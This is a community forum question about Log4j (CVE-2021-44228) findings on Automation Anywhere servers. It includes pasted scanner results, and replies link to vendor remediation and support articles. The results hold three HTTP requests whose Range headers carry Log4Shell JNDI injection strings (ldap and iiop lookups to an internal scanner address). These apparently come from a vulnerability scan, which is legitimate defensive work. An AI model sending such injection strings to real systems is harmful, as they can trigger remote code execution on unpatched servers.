Question

Hello Team, We are facing Log4j Vulnerability issue on Automation Anywhere for existing java jar files, so need urgent support to analyse and resolve the issue in our environment.

  • 27 April 2022
  • 2 replies
  • 12 views

 

 

CVE ID

Port

Results

CVE-2021-44228

8081

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 8081 port.

GET / HTTP/1.0

Host: cpcinchdv003851.cts.com:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:42187/QUALYSTEST}#

CVE-2021-44228

443

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 443 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:36528/QUALYSTEST}#

CVE-2021-44228

81

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 81 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com:81

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:iiop://10.238.51.15:36013/QUALYSTEST}#


2 replies

Userlevel 4
Badge +8

Hello @RAHUL BORADE​  Is it A360 OnPremise ? If yes, follow the article below.

 

https://apeople.automationanywhere.com/s/article/A360-On-Premise-Update-regarding-CVE-2021-44228-related-to-0-day-in-the-Apache-Log4j2-Java-library

Userlevel 4
Badge +8

@RAHUL BORADE​ :

 

if you are still facing an issue then please create a support case

 

How to create a support case :

https://apeople.automationanywhere.com/s/article/How-to-create-a-support-case-in-service-cloud

 

if you don't have access to the above link, email the AA Support team "apeopleopsteam@automationanywhere.com" to get access.

Reply